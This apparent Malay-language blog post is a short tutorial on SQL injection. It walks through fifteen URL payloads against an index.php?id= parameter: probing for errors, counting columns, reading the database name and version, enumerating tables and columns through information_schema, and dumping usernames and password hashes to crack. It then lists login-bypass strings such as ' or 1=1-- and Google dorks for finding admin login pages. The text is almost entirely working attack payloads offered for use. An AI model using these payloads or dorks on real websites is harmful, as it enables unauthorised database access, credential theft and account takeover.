SQL Injection secara ringkas by try

1. index.php?id=4 (asal)

2. index.php?id=4' (ada error/bug sql)

3. index.php?id=4+and+1=1-- (nilai true)( tanda + sama jgk dengan %20 pada url address iaitu jarak)

4. index.php?id=4+and+1=2-- (false,tiada paparan)

5. index.php?id=4+order+by+5-- (cari berapa banyak column)(contohnya ada 5 column)

6. index.php?id=4+union+select+1,2,3,4,5-- (cari column yang boleh di inject)(tiada perubahan)

7. index.php?id=-4+union+select+1,2,3,4,5-- (paparan nombor)(contoh terdapat paparan nombor 2 dan 3 iaitu column yang mempunyai bug)

8. index.php?id=-4+union+select+1,database(),3,4,5-- (lihat database)(gantikan pada nombor 2 atau 3)

9. index.php?id=-4+union+select+1,concat(user(),0x3a,database()),version(),4,5-- (alternatif untuk lihat sekaligus)(0x3a sama jgk : tetapi convert dlm hexa)

10. index.php?id=-4+union+select+1,2,table_name,4,5+from+information_schema.tables
+where+table_schema=database()+limit+0,1-- (dapatkan nama table 1per 1)

11. index.php?id=-4+union+select+1,2,group_concat(table_name),4,5+from
+information_schema.tables+where+table_schema=database()-- (tgk semua table sekaligus)(skip yg no.10 untuk mudah)(contoh table yang dapat ialah table_user)

12. index.php?id=-4+union+select+1,2,column_name,4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572+limit+0,1-- (dapatkan nama column)(convert nama table_user ke hexa,awalan tmbah 0x)

13. index.php?id=-4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572-- (tgk semua nama column dalam table_user)(contoh dapat user_id dan password_id)

14. index.php?id=-4+union+select+1,database(),concat(user_id,password_id),4,5+from+table_user-- (tgk username dan pass)(perlu crack md5 untuk mendapatkan pass)

15. index.php?id=-4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user-- (tgk semua username dan pass)

ni untuk versi 5...


beberapa bypass login yg bleh digunakan utk sql injection

'or''='
or 1=1--
" or 1=1--
' or 1=1--

' or 0=0 --
" or 0=0 --
or 0=0 --

' or 'x'='x
" or "x"="x
') or ('x'='x



dork =
inurl:/admin/login.asp
inurl:/admin_login.asp
inurl:/admin/admin_login.asp
inurl:/administrator.asp


0 comments:

Post a Comment